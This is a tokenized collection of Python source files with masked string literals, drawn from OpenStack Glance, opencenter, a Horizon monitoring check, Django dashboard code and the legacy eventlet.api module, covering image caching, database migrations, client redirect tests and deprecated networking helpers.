error ( msg ) <EOL> conn . rollback ( ) <EOL> finally : <EOL> conn . close ( ) <EOL> def queue_image ( self , image_id ) : <EOL> """<STR_LIT>""" <EOL> if self . is_cached ( image_id ) : <EOL> msg = _ ( "<STR_LIT>" ) % image_id <EOL> logger . warn ( msg ) <EOL> return False <EOL> if self . is_being_cached ( image_id ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % image_id <EOL> logger . warn ( msg ) <EOL> return False <EOL> if self . is_queued ( image_id ) : <EOL> msg = _ ( "<STR_LIT>" ) % image_id <EOL> logger . warn ( msg ) <EOL> return False <EOL> path = self . get_image_filepath ( image_id , '<STR_LIT>' ) <EOL> with open ( path , "<STR_LIT:w>" ) as f : <EOL> pass <EOL> return True <EOL> def delete_invalid_files ( self ) : <EOL> """<STR_LIT>""" <EOL> for path in self . get_cache_files ( self . invalid_dir ) : <EOL> os . unlink ( path ) <EOL> logger . info ( "<STR_LIT>" , path ) <EOL> def delete_stalled_files ( self , older_than ) : <EOL> """<STR_LIT>""" <EOL> for path in self . get_cache_files ( self . incomplete_dir ) : <EOL> os . unlink ( path ) <EOL> logger . info ( "<STR_LIT>" , path ) <EOL> def get_queued_images ( self ) : <EOL> """<STR_LIT>""" <EOL> files = [ f for f in self . get_cache_files ( self . queue_dir ) ] <EOL> items = [ ] <EOL> for path in files : <EOL> mtime = os . path . getmtime ( path ) <EOL> items . append ( ( mtime , os . path . basename ( path ) ) ) <EOL> items . sort ( ) <EOL> return [ image_id for ( mtime , image_id ) in items ] <EOL> def get_cache_files ( self , basepath ) : <EOL> """<STR_LIT>""" <EOL> for fname in os . listdir ( basepath ) : <EOL> path = os . path . join ( basepath , fname ) <EOL> if path != self . db_path and os . path . isfile ( path ) : <EOL> yield path <EOL> def delete_cached_file ( path ) : <EOL> if os . path . exists ( path ) : <EOL> logger . debug ( _ ( "<STR_LIT>" ) , path ) <EOL> os . unlink ( path ) <EOL> else : <EOL> logger . warn ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , path ) </s>
<s> from migrate . changeset import * <EOL> from sqlalchemy import * <EOL> from sqlalchemy . sql import and_ , not_ <EOL> from glance . registry . db . migrate_repo . schema import ( <EOL> Boolean , DateTime , BigInteger , Integer , String , <EOL> Text , from_migration_import ) <EOL> def get_images_table ( meta ) : <EOL> """<STR_LIT>""" <EOL> images = Table ( '<STR_LIT>' , meta , <EOL> Column ( '<STR_LIT:id>' , Integer ( ) , primary_key = True , nullable = False ) , <EOL> Column ( '<STR_LIT:name>' , String ( <NUM_LIT:255> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:20> ) ) , <EOL> Column ( '<STR_LIT:size>' , BigInteger ( ) ) , <EOL> Column ( '<STR_LIT:status>' , String ( <NUM_LIT:30> ) , nullable = False ) , <EOL> Column ( '<STR_LIT>' , Boolean ( ) , nullable = False , default = False , <EOL> index = True ) , <EOL> Column ( '<STR_LIT:location>' , Text ( ) ) , <EOL> Column ( '<STR_LIT>' , DateTime ( ) , nullable = False ) , <EOL> Column ( '<STR_LIT>' , DateTime ( ) ) , <EOL> Column ( '<STR_LIT>' , DateTime ( ) ) , <EOL> Column ( '<STR_LIT>' , Boolean ( ) , nullable = False , default = False , <EOL> index = True ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:32> ) ) , <EOL> Column ( '<STR_LIT>' , String ( <NUM_LIT:255> ) ) , <EOL> mysql_engine = '<STR_LIT>' , <EOL> useexisting = True ) <EOL> return images <EOL> def get_image_properties_table ( meta ) : <EOL> """<STR_LIT>""" <EOL> ( get_image_properties_table , ) = from_migration_import ( <EOL> '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> image_properties = get_image_properties_table ( meta ) <EOL> return image_properties <EOL> def upgrade ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . bind = migrate_engine <EOL> images = get_images_table ( meta ) <EOL> owner = Column ( '<STR_LIT>' , String ( <NUM_LIT:255> ) ) <EOL> owner . create ( images ) <EOL> def downgrade ( migrate_engine ) : <EOL> meta = MetaData ( ) <EOL> meta . 
bind = migrate_engine <EOL> images = get_images_table ( meta ) <EOL> images . columns [ '<STR_LIT>' ] . drop ( ) </s>
<s> """<STR_LIT>""" <EOL> import eventlet . patcher <EOL> import webob . dec <EOL> import webob . exc <EOL> from glance . common import client <EOL> from glance . common import exception <EOL> from glance . common import wsgi <EOL> from glance . tests import functional <EOL> from glance . tests import utils <EOL> eventlet . patcher . monkey_patch ( socket = True ) <EOL> class RedirectTestApp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> """<STR_LIT>""" <EOL> self . name = name <EOL> @ webob . dec . wsgify <EOL> def __call__ ( self , request ) : <EOL> """<STR_LIT>""" <EOL> base = "<STR_LIT>" % request . host <EOL> path = request . path_qs <EOL> if path == "<STR_LIT:/>" : <EOL> return "<STR_LIT:root>" <EOL> elif path == "<STR_LIT>" : <EOL> url = "<STR_LIT>" % base <EOL> raise webob . exc . HTTPFound ( location = url ) <EOL> elif path == "<STR_LIT>" : <EOL> url = "<STR_LIT>" % base <EOL> raise webob . exc . HTTPFound ( location = url ) <EOL> elif path == "<STR_LIT>" : <EOL> raise webob . exc . HTTPFound ( location = request . url ) <EOL> elif path . startswith ( "<STR_LIT>" ) : <EOL> url = "<STR_LIT>" % path . split ( "<STR_LIT:->" ) [ - <NUM_LIT:1> ] <EOL> raise webob . exc . HTTPFound ( location = url ) <EOL> elif path == "<STR_LIT>" : <EOL> return "<STR_LIT>" % self . name <EOL> elif path == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> class TestClientRedirects ( functional . FunctionalTest ) : <EOL> def setUp ( self ) : <EOL> super ( TestClientRedirects , self ) . setUp ( ) <EOL> self . port_one = utils . get_unused_port ( ) <EOL> self . port_two = utils . get_unused_port ( ) <EOL> server_one = wsgi . Server ( ) <EOL> server_two = wsgi . Server ( ) <EOL> conf = utils . TestConfigOpts ( { '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } ) <EOL> server_one . start ( RedirectTestApp ( "<STR_LIT>" ) , conf , self . port_one ) <EOL> server_two . start ( RedirectTestApp ( "<STR_LIT>" ) , conf , self . port_two ) <EOL> self . 
client = client . BaseClient ( "<STR_LIT:127.0.0.1>" , self . port_one ) <EOL> def test_get_without_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:GET>" , "<STR_LIT:/>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT:root>" , response . read ( ) ) <EOL> def test_get_with_one_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:GET>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> def test_get_with_one_redirect_query_string ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:GET>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> def test_get_with_max_redirects ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( exception . MaxRedirectsExceeded , <EOL> self . client . do_request , <EOL> "<STR_LIT:GET>" , <EOL> "<STR_LIT>" ) <EOL> def test_post_redirect ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . do_request ( "<STR_LIT:POST>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> def test_redirect_to_new_host ( self ) : <EOL> """<STR_LIT>""" <EOL> url = "<STR_LIT>" % self . port_two <EOL> response = self . client . do_request ( "<STR_LIT:POST>" , url ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) <EOL> response = self . client . do_request ( "<STR_LIT:POST>" , "<STR_LIT>" ) <EOL> self . assertEquals ( <NUM_LIT:200> , response . status ) <EOL> self . assertEquals ( "<STR_LIT>" , response . read ( ) ) </s>
<s> import os <EOL> import commands <EOL> import datetime <EOL> import re <EOL> import unittest <EOL> from glance . common import crypt <EOL> from glance . common import exception <EOL> from glance . common import utils <EOL> def parse_mailmap ( mailmap = '<STR_LIT>' ) : <EOL> mapping = { } <EOL> if os . path . exists ( mailmap ) : <EOL> fp = open ( mailmap , '<STR_LIT:r>' ) <EOL> for l in fp : <EOL> l = l . strip ( ) <EOL> if not l . startswith ( '<STR_LIT:#>' ) and '<STR_LIT:U+0020>' in l : <EOL> canonical_email , alias = l . split ( '<STR_LIT:U+0020>' ) <EOL> mapping [ alias ] = canonical_email <EOL> return mapping <EOL> def str_dict_replace ( s , mapping ) : <EOL> for s1 , s2 in mapping . iteritems ( ) : <EOL> s = s . replace ( s1 , s2 ) <EOL> return s <EOL> class AuthorsTestCase ( unittest . TestCase ) : <EOL> def test_authors_up_to_date ( self ) : <EOL> topdir = os . path . normpath ( os . path . dirname ( __file__ ) + '<STR_LIT>' ) <EOL> contributors = set ( ) <EOL> missing = set ( ) <EOL> authors_file = open ( os . path . join ( topdir , '<STR_LIT>' ) , '<STR_LIT:r>' ) . read ( ) <EOL> if os . path . exists ( os . path . join ( topdir , '<STR_LIT>' ) ) : <EOL> mailmap = parse_mailmap ( os . path . join ( topdir , '<STR_LIT>' ) ) <EOL> for email in commands . getoutput ( '<STR_LIT>' ) . split ( ) : <EOL> if not email : <EOL> continue <EOL> if "<STR_LIT>" in email and "<STR_LIT>" in email : <EOL> continue <EOL> email = '<STR_LIT:<>' + email + '<STR_LIT:>>' <EOL> contributors . add ( str_dict_replace ( email , mailmap ) ) <EOL> for contributor in contributors : <EOL> if contributor == '<STR_LIT>' : <EOL> continue <EOL> if not contributor in authors_file : <EOL> missing . add ( contributor ) <EOL> self . assertTrue ( len ( missing ) == <NUM_LIT:0> , <EOL> '<STR_LIT>' % missing ) <EOL> class UtilsTestCase ( unittest . 
TestCase ) : <EOL> def test_bool_from_string ( self ) : <EOL> true_values = [ '<STR_LIT:True>' , True , '<STR_LIT:true>' , '<STR_LIT>' , '<STR_LIT:1>' , <NUM_LIT:1> , '<STR_LIT>' , '<STR_LIT>' ] <EOL> i = <NUM_LIT:0> <EOL> for value in true_values : <EOL> self . assertTrue ( utils . bool_from_string ( value ) , <EOL> "<STR_LIT>" % ( value , i ) ) <EOL> i = i + <NUM_LIT:1> <EOL> false_values = [ '<STR_LIT:False>' , False , '<STR_LIT:false>' , '<STR_LIT:T>' , '<STR_LIT:F>' , '<STR_LIT>' , <EOL> '<STR_LIT:0>' , <NUM_LIT:0> , <NUM_LIT:9> , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for value in false_values : <EOL> self . assertFalse ( utils . bool_from_string ( value ) , <EOL> "<STR_LIT>" % value ) <EOL> def test_import_class_or_object ( self ) : <EOL> self . assertRaises ( exception . ImportFailure , utils . import_class , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ImportFailure , utils . import_class , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ImportFailure , utils . import_class , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( exception . ImportFailure , utils . import_object , <EOL> '<STR_LIT>' ) <EOL> store_class = utils . import_class ( '<STR_LIT>' ) <EOL> self . assertTrue ( store_class . __name__ == '<STR_LIT>' ) <EOL> ex_obj = utils . import_object ( '<STR_LIT>' ) <EOL> self . assertTrue ( ex_obj . __class__ . __name__ == '<STR_LIT>' ) <EOL> module_obj = utils . import_object ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , module_obj . __package__ ) <EOL> def test_isotime ( self ) : <EOL> dt1 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:11> , <NUM_LIT:10> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> self . assertEqual ( '<STR_LIT>' , utils . isotime ( dt1 ) ) <EOL> iso_re = re . compile ( r'<STR_LIT>' ) <EOL> now_iso = utils . isotime ( ) <EOL> self . assertTrue ( iso_re . 
match ( now_iso ) is not None ) <EOL> def test_encryption ( self ) : <EOL> key_list = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> plaintext_list = [ '<STR_LIT>' ] <EOL> blocksize = <NUM_LIT:64> <EOL> for i in range ( <NUM_LIT:3> * blocksize ) : <EOL> plaintext_list . append ( os . urandom ( i ) ) <EOL> for key in key_list : <EOL> for plaintext in plaintext_list : <EOL> ciphertext = crypt . urlsafe_encrypt ( key , plaintext , blocksize ) <EOL> self . assertTrue ( ciphertext != plaintext ) <EOL> text = crypt . urlsafe_decrypt ( key , ciphertext ) <EOL> self . assertTrue ( plaintext == text ) </s>
<s> import opencenter <EOL> import string <EOL> class NovaBackend ( opencenter . backends . Backend ) : <EOL> def __init__ ( self ) : <EOL> super ( NovaBackend , self ) . __init__ ( __file__ ) <EOL> def additional_constraints ( self , api , node_id , action , ns ) : <EOL> return [ ] <EOL> def _make_subcontainer ( self , api , name , parent_id , facts , backends , <EOL> attrs = None ) : <EOL> subcontainer = api . _model_create ( '<STR_LIT>' , { '<STR_LIT:name>' : name } ) <EOL> if subcontainer is None : <EOL> return None <EOL> if attrs is None : <EOL> attrs = { } <EOL> if facts is None : <EOL> facts = { } <EOL> facts . update ( { '<STR_LIT>' : parent_id , <EOL> '<STR_LIT>' : backends } ) <EOL> data = { } <EOL> data [ '<STR_LIT>' ] = facts <EOL> data [ '<STR_LIT>' ] = attrs <EOL> for t in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> for k , v in data [ t ] . items ( ) : <EOL> d = { '<STR_LIT:key>' : k , <EOL> '<STR_LIT:value>' : v , <EOL> '<STR_LIT>' : subcontainer [ '<STR_LIT:id>' ] } <EOL> api . _model_create ( t , d ) <EOL> return subcontainer <EOL> def create_az ( self , state_data , api , node_id , ** kwargs ) : <EOL> if not '<STR_LIT>' in kwargs : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> valid = string . letters + string . digits + "<STR_LIT:_>" <EOL> test_valid = all ( [ c in valid for c in kwargs [ '<STR_LIT>' ] ] ) <EOL> if not test_valid : <EOL> return self . _fail ( msg = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> r = api . nodes_query ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( <EOL> node_id , kwargs [ '<STR_LIT>' ] ) ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> self . _make_subcontainer ( api , <EOL> '<STR_LIT>' % kwargs [ '<STR_LIT>' ] , <EOL> node_id , <EOL> { '<STR_LIT>' : kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : kwargs [ '<STR_LIT>' ] } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self . 
_ok ( ) <EOL> def create_cluster ( self , state_data , api , node_id , ** kwargs ) : <EOL> kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if not '<STR_LIT>' in kwargs : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> valid = string . letters + string . digits + "<STR_LIT>" <EOL> test_valid = all ( [ c in valid for c in kwargs [ '<STR_LIT>' ] ] ) <EOL> if not test_valid : <EOL> return self . _fail ( msg = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> r = api . nodes_query ( '<STR_LIT>' % ( <EOL> kwargs [ '<STR_LIT>' ] , ) ) <EOL> if len ( r ) > <NUM_LIT:0> : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> cluster_facts = [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> environment_hash = { } <EOL> for k , v in kwargs . items ( ) : <EOL> if k in cluster_facts : <EOL> environment_hash [ k ] = v <EOL> environment_hash [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> environment_hash [ '<STR_LIT>' ] = kwargs [ '<STR_LIT>' ] <EOL> environment_hash [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> environment_hash [ '<STR_LIT>' ] = <NUM_LIT:16> <EOL> environment_hash [ '<STR_LIT>' ] = "<STR_LIT:false>" <EOL> environment_hash [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> cluster = self . _make_subcontainer ( <EOL> api , kwargs [ '<STR_LIT>' ] , node_id , environment_hash , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> attrs = { "<STR_LIT>" : True } ) <EOL> if cluster is None : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> infra = self . _make_subcontainer ( <EOL> api , '<STR_LIT>' , cluster [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : False } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if infra is None : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> comp = self . 
_make_subcontainer ( <EOL> api , '<STR_LIT>' , cluster [ '<STR_LIT:id>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { "<STR_LIT>" : True } ) <EOL> if comp is None : <EOL> return self . _fail ( msg = '<STR_LIT>' ) <EOL> az = kwargs [ '<STR_LIT>' ] <EOL> self . _make_subcontainer ( <EOL> api , '<STR_LIT>' % az , comp [ '<STR_LIT:id>' ] , { '<STR_LIT>' : az } , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> return self . _ok ( ) </s>
<s> import unittest2 <EOL> import sys <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> loader = unittest2 . TestLoader ( ) <EOL> tests = loader . discover ( '<STR_LIT>' ) <EOL> testRunner = unittest2 . runner . TextTestRunner ( stream = sys . stdout , <EOL> verbosity = <NUM_LIT:2> ) <EOL> runner = testRunner . run ( tests ) <EOL> sys . exit ( not runner . wasSuccessful ( ) ) </s>
<s> import argparse <EOL> import re <EOL> import ipaddr <EOL> from lxml import html <EOL> from maas_common import get_auth_details <EOL> from maas_common import metric <EOL> from maas_common import metric_bool <EOL> from maas_common import print_output <EOL> from maas_common import status_err <EOL> from maas_common import status_ok <EOL> import requests <EOL> from requests import exceptions as exc <EOL> def check ( args ) : <EOL> if requests . __build__ >= <NUM_LIT> : <EOL> requests . packages . urllib3 . disable_warnings ( ) <EOL> splash_status_code = <NUM_LIT:0> <EOL> splash_milliseconds = <NUM_LIT:0.0> <EOL> login_status_code = <NUM_LIT:0> <EOL> login_milliseconds = <NUM_LIT:0.0> <EOL> is_up = True <EOL> auth_details = get_auth_details ( ) <EOL> OS_USERNAME = auth_details [ '<STR_LIT>' ] <EOL> OS_PASSWORD = auth_details [ '<STR_LIT>' ] <EOL> HORIZON_URL = '<STR_LIT>' . format ( ip = args . ip ) <EOL> HORIZON_PORT = '<STR_LIT>' <EOL> s = requests . Session ( ) <EOL> try : <EOL> r = s . get ( '<STR_LIT>' % ( HORIZON_URL , HORIZON_PORT ) , <EOL> verify = False , <EOL> timeout = <NUM_LIT:10> ) <EOL> except ( exc . ConnectionError , <EOL> exc . HTTPError , <EOL> exc . Timeout ) as e : <EOL> is_up = False <EOL> else : <EOL> if not ( r . ok and <EOL> re . search ( '<STR_LIT>' , r . content , re . IGNORECASE ) ) : <EOL> status_err ( '<STR_LIT>' ) <EOL> splash_status_code = r . status_code <EOL> splash_milliseconds = r . elapsed . total_seconds ( ) * <NUM_LIT:1000> <EOL> csrf_token = html . fromstring ( r . content ) . xpath ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> region = html . fromstring ( r . content ) . xpath ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> s . headers . update ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : HORIZON_URL } ) <EOL> payload = { '<STR_LIT:username>' : OS_USERNAME , <EOL> '<STR_LIT:password>' : OS_PASSWORD , <EOL> '<STR_LIT>' : csrf_token , <EOL> '<STR_LIT>' : region } <EOL> try : <EOL> l = s . 
post ( <EOL> ( '<STR_LIT>' ) % ( HORIZON_URL , HORIZON_PORT ) , <EOL> data = payload , <EOL> verify = False ) <EOL> except ( exc . ConnectionError , <EOL> exc . HTTPError , <EOL> exc . Timeout ) as e : <EOL> status_err ( '<STR_LIT>' % e ) <EOL> if not ( l . ok and re . search ( '<STR_LIT>' , l . content , re . IGNORECASE ) ) : <EOL> status_err ( '<STR_LIT>' ) <EOL> login_status_code = l . status_code <EOL> login_milliseconds = l . elapsed . total_seconds ( ) * <NUM_LIT:1000> <EOL> status_ok ( ) <EOL> metric_bool ( '<STR_LIT>' , is_up ) <EOL> if is_up : <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , splash_status_code , '<STR_LIT>' ) <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , splash_milliseconds , '<STR_LIT>' ) <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , login_status_code , '<STR_LIT>' ) <EOL> metric ( '<STR_LIT>' , '<STR_LIT>' , login_milliseconds , '<STR_LIT>' ) <EOL> def main ( args ) : <EOL> check ( args ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> with print_output ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> type = ipaddr . IPv4Address , <EOL> help = '<STR_LIT>' ) <EOL> args = parser . parse_args ( ) <EOL> main ( args ) </s>
<s> import argparse <EOL> import errno <EOL> import yaml <EOL> def parse_args ( ) : <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> return parser . parse_args ( ) <EOL> def get_config ( path ) : <EOL> try : <EOL> with open ( path ) as f : <EOL> data = f . read ( ) <EOL> except IOError as e : <EOL> if e . errno == errno . ENOENT : <EOL> data = None <EOL> else : <EOL> raise e <EOL> if data is None : <EOL> return { } <EOL> else : <EOL> return yaml . safe_load ( data ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> args = parse_args ( ) <EOL> base = get_config ( args . base ) <EOL> overrides = get_config ( args . overrides ) <EOL> config = dict ( base . items ( ) + overrides . items ( ) ) <EOL> if config : <EOL> with open ( args . base , '<STR_LIT:w>' ) as f : <EOL> f . write ( str ( yaml . safe_dump ( config , default_flow_style = False ) ) ) </s>
<s> from fetch_core import setup_environment , cprint <EOL> setup_environment ( ) <EOL> from dashboard . models import Project <EOL> projects = list ( Project . objects . exclude ( active = False ) . exclude ( pending = True ) ) <EOL> for project in projects : <EOL> cprint ( "<STR_LIT>" . format ( project . title ) , "<STR_LIT>" , attrs = [ "<STR_LIT>" ] ) <EOL> project . do_warnings ( ) <EOL> cprint ( "<STR_LIT>" . format ( project . title ) , "<STR_LIT>" , attrs = [ "<STR_LIT>" ] ) </s>
<s>
# South schema migration: create the subscriber table with an email column.
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Create the table: an auto primary key plus an email column.
        db.create_table(u'<STR_LIT>', (
            (u'<STR_LIT:id>', self.gf('<STR_LIT>')(primary_key=True)),
            ('<STR_LIT:email>', self.gf('<STR_LIT>')(max_length=<NUM_LIT:200>)),
        ))
        db.send_create_signal(u'<STR_LIT>', ['<STR_LIT>'])

    def backwards(self, orm):
        # Reverse of forwards(): drop the table.
        db.delete_table(u'<STR_LIT>')

    # Frozen ORM snapshot South uses to reconstruct models at this point
    # in history; must not be edited by hand.
    models = {
        u'<STR_LIT>': {
            '<STR_LIT:Meta>': {'<STR_LIT:object_name>': '<STR_LIT>'},
            '<STR_LIT:email>': ('<STR_LIT>', [], {'<STR_LIT:max_length>': '<STR_LIT>'}),
            u'<STR_LIT:id>': ('<STR_LIT>', [], {'<STR_LIT:primary_key>': '<STR_LIT:True>'})
        }
    }

    complete_apps = ['<STR_LIT>']
</s>
<s>
# Root URLconf for the dashboard project.
from dashboard.feeds import *
from dashboard.views import *
from django.conf.urls import *
from django.contrib import admin

# Register ModelAdmin classes from all installed apps.
admin.autodiscover()

urlpatterns = patterns('<STR_LIT>',
    (r'<STR_LIT>', include('<STR_LIT>')),
    (r'<STR_LIT>', include(admin.site.urls)),
    (r'<STR_LIT>', include('<STR_LIT>')),
    (r'<STR_LIT>', include('<STR_LIT>')),
    (r'<STR_LIT>', include('<STR_LIT>')),
    # NOTE(review): `feed` and `EventsFeed` come from the star imports
    # above — presumably dashboard.feeds; confirm against that module.
    (r'<STR_LIT>', feed.event),
    (r'<STR_LIT>', feed.feed),
    (r'<STR_LIT>', EventsFeed()),
)
</s>
<s>
# DEPRECATED eventlet.api compatibility module (Python 2): thin,
# warning-emitting wrappers and aliases for the modern eventlet.hubs /
# eventlet.greenthread APIs.
import errno
import sys
import socket
import string
import linecache
import inspect
import warnings

from eventlet.support import greenlets as greenlet, BaseException
from eventlet import hubs
from eventlet import greenthread
from eventlet import debug
from eventlet import Timeout

# Public names re-exported by this legacy module.
__all__ = [
    '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
    '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']

# Importing this module at all is deprecated.
warnings.warn("<STR_LIT>"
              "<STR_LIT>", DeprecationWarning, stacklevel=<NUM_LIT:2>)


def get_hub(*a, **kw):
    # Deprecated alias for hubs.get_hub().
    warnings.warn("<STR_LIT>",
                  DeprecationWarning, stacklevel=<NUM_LIT:2>)
    return hubs.get_hub(*a, **kw)


def get_default_hub(*a, **kw):
    # Deprecated alias for hubs.get_default_hub().
    warnings.warn("<STR_LIT>"
                  "<STR_LIT>",
                  DeprecationWarning, stacklevel=<NUM_LIT:2>)
    return hubs.get_default_hub(*a, **kw)


def use_hub(*a, **kw):
    # Deprecated alias for hubs.use_hub().
    warnings.warn("<STR_LIT>",
                  DeprecationWarning, stacklevel=<NUM_LIT:2>)
    return hubs.use_hub(*a, **kw)


def switch(coro, result=None, exc=None):
    # Resume *coro*, either throwing *exc* into it or passing *result*.
    if exc is not None:
        return coro.throw(exc)
    return coro.switch(result)


Greenlet = greenlet.greenlet


def tcp_listener(address, backlog=<NUM_LIT:50>):
    """<STR_LIT>"""
    warnings.warn("""<STR_LIT>""",
                  DeprecationWarning, stacklevel=<NUM_LIT:2>)
    from eventlet import greenio, util
    # NOTE: the local `socket` here shadows the module-level socket import.
    socket = greenio.GreenSocket(util.tcp_socket())
    util.socket_bind_and_listen(socket, address, backlog=backlog)
    return socket


def ssl_listener(address, certificate, private_key):
    """<STR_LIT>"""
    from eventlet import util
    import socket
    # The local name `socket` is rebound from the module to the wrapped
    # listening socket.
    socket = util.wrap_ssl(socket.socket(), certificate, private_key, True)
    socket.bind(address)
    socket.listen(<NUM_LIT:50>)
    return socket


def connect_tcp(address, localaddr=None):
    """<STR_LIT>"""
    warnings.warn("""<STR_LIT>""",
                  DeprecationWarning, stacklevel=<NUM_LIT:2>)
    from eventlet import greenio, util
    desc = greenio.GreenSocket(util.tcp_socket())
    if localaddr is not None:
        desc.bind(localaddr)
    desc.connect(address)
    return desc


# Direct aliases into the modern modules.
TimeoutError = greenthread.TimeoutError
trampoline = hubs.trampoline
spawn = greenthread.spawn
spawn_n = greenthread.spawn_n
kill = greenthread.kill
call_after = greenthread.call_after
call_after_local = greenthread.call_after_local
call_after_global = greenthread.call_after_global


class _SilentException(BaseException):
    # Sentinel raised when the caller asked for a silent timeout
    # (timeout(seconds, None)); swallowed by timeout.__exit__.
    pass


class FakeTimer(object):
    # No-op stand-in used when seconds is None (no timeout armed).
    def cancel(self):
        pass


class timeout(object):
    """<STR_LIT>"""

    def __init__(self, seconds, *throw_args):
        self.seconds = seconds
        # seconds=None means "no timeout": throw_args is deliberately
        # left unset because __enter__ uses a FakeTimer in that case.
        if seconds is None:
            return
        if not throw_args:
            self.throw_args = (TimeoutError(),)
        elif throw_args == (None,):
            # Explicit None requests silent expiry via _SilentException.
            self.throw_args = (_SilentException(),)
        else:
            self.throw_args = throw_args

    def __enter__(self):
        if self.seconds is None:
            self.timer = FakeTimer()
        else:
            # Arm a timer that throws throw_args into this greenthread.
            self.timer = exc_after(self.seconds, *self.throw_args)
        return self.timer

    def __exit__(self, typ, value, tb):
        self.timer.cancel()
        # Suppress only our own silent-timeout sentinel.
        if typ is _SilentException and value in self.throw_args:
            return True


with_timeout = greenthread.with_timeout
exc_after = greenthread.exc_after
sleep = greenthread.sleep
getcurrent = greenlet.getcurrent
GreenletExit = greenlet.GreenletExit
spew = debug.spew
